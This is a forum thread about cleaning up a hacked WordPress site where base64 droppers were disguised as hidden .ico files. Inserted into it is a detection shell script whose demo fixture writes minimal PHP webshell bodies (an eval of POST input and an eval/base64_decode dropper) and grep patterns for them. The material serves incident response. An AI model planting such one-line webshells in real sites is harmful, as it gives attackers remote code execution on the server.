
totally not pwnd bro....:O

Posted: 12 Feb 2022, 18:17
by bad_brain
Client site on AWS Lightsail, standard WordPress install. Curious if the server instance was rooted...


Re: totally not pwnd bro....:O

Posted: 13 Feb 2022, 07:02
by ayu
As the kids would say these days: "big ooof bro!" :lol:

Guess you've got some cleanup to do?

Re: totally not pwnd bro....:O

Posted: 17 Feb 2022, 17:10
by bad_brain
ayu wrote:
13 Feb 2022, 07:02
Guess you've got some cleanup to do?
Yep! Got most of it done, but until the site is live and traffic rolls in (right now I access it through the HOSTS file) you never know if you found everything.
There was plenty of the usual base64 script crap disguised as .ico files; luckily they all used the same unusual name pattern, so I could easily find them all by running a search for .*.ico:
https://code.suck-o.com/?c67218b44679ef ... rFG95Bekvx

Deleted everything else except for the uploads and replaced it with newly downloaded plugins. I'm sure there's still some crap left in the uploads, but those are hundreds of folders with thousands of images, so I'd rather let it go live and then check the logs for POST requests... basically I let potential attackers do my work... :lol:
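The two checks described in the post above, as an added example (this is not bad_brain's script or anything from the thread): a hunt for dot-prefixed ".ico" files that actually contain PHP, a grep for POST requests aimed at wp-content/uploads, and a decoder for the base64-looking segment in upload names like the one quoted later in the thread. The directory tree, file bodies and access-log lines are all constructed here for the demo; the flag-worthy patterns (`<?php`, `base64_decode`, `eval(`) are assumptions about what such droppers look like, not a signature taken from the page.

```shell
#!/bin/sh
# Added example, not code from the original post. Everything under
# make_demo is constructed sample data.

# find_ico_webshells DIR: print hidden *.ico files under DIR whose body
# holds a PHP tag or the base64_decode/eval idiom (assumed dropper markers).
find_ico_webshells() {
    # -name '.*.ico' only matches dot-files such as .a1b2c3.ico, so a real
    # favicon.ico is never opened; -exec ... {} + batches the grep and runs
    # nothing at all when there is no match (unlike a bare xargs pipeline).
    find "$1" -type f -name '.*.ico' \
        -exec grep -lE '<\?php|base64_decode|eval\(' {} + 2>/dev/null
    return 0
}

# suspicious_posts LOGFILE: print POST requests to the uploads tree, the
# place where a left-over shell would be talked to once the site is live.
suspicious_posts() {
    grep -E '"POST /wp-content/uploads/' "$1"
    return 0
}

# decode_name_segment FILENAME: pull out the padded base64 chunk of a
# filename (e.g. YXJjLmpwZw== in the upload name quoted in the thread)
# and decode it to see the name the uploader actually used.
decode_name_segment() {
    # Only padded chunks are considered; a hex id like 814e05fb32a2e1b4 is
    # valid base64 alphabet too, but carries no '=' and is skipped.
    seg=$(printf '%s\n' "$1" | grep -oE '[A-Za-z0-9+/]+={1,2}' | head -n 1)
    [ -n "$seg" ] || return 1
    printf '%s' "$seg" | base64 -d 2>/dev/null
}

# make_demo DIR: build a constructed WordPress-like tree plus access log.
make_demo() {
    d="$1"
    mkdir -p "$d/wp-content/uploads/2021/07" "$d/wp-content/themes/x"
    # a genuine favicon (binary header) that must NOT be flagged
    printf '\000\000\001\000' > "$d/wp-content/themes/x/favicon.ico"
    # hidden "icon" that is really a PHP dropper: must be flagged
    printf '<?php eval(base64_decode("%s")); ?>' 'ZWNobyAxOw==' \
        > "$d/wp-content/uploads/2021/07/.a1b2c3.ico"
    # second hidden shell with a different body, higher in the tree
    printf '<?php @eval($_POST["x"]); ?>' > "$d/wp-content/uploads/.zz9.ico"
    # constructed access log: benign GET, one POST to the dropper, one login POST
    cat > "$d/access.log" <<'EOF'
203.0.113.5 - - [20/Feb/2022:10:00:01 +0000] "GET /wp-content/uploads/2021/07/pic.jpg HTTP/1.1" 200 1234
203.0.113.9 - - [20/Feb/2022:10:00:07 +0000] "POST /wp-content/uploads/2021/07/.a1b2c3.ico HTTP/1.1" 200 17
203.0.113.9 - - [20/Feb/2022:10:00:09 +0000] "POST /wp-login.php HTTP/1.1" 302 0
EOF
}

# Run with --demo to see the output on the constructed tree.
if [ "${1:-}" = "--demo" ]; then
    t=$(mktemp -d)
    make_demo "$t"
    echo "== hidden .ico files containing PHP =="; find_ico_webshells "$t"
    echo "== POSTs into uploads =="; suspicious_posts "$t/access.log"
    echo "== decoded name segment =="
    decode_name_segment 'image_uploads.file_upload.814e05fb32a2e1b4.YXJjLmpwZw==.jpg'; echo
    rm -rf "$t"
fi
```

On a real site, point find_ico_webshells at the WordPress root and suspicious_posts at the web server's access log; the decoder just tells you what name an uploaded file was originally given, which is useful when deciding whether a renamed "image" deserves a closer look.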

Re: totally not pwnd bro....:O

Posted: 25 Feb 2022, 04:48
by ph0bYx
Good job *thumb*
Do you know how it happened? Probably some WordPress plugin that had a backdoor or was unpatched?

Re: totally not pwnd bro....:O

Posted: 25 Feb 2022, 15:03
by bad_brain
ph0bYx wrote:
25 Feb 2022, 04:48
Good job *thumb*
Do you know how it happened? Probably some WordPress plugin that had a backdoor or was unpatched?
Hard to say what exactly caused it; the site ran that way for a long time already... but yeah, this might have played a role:
image_uploads.file_upload.814e05fb32a2e1b4.YXJjLmpwZw==.jpg
:-88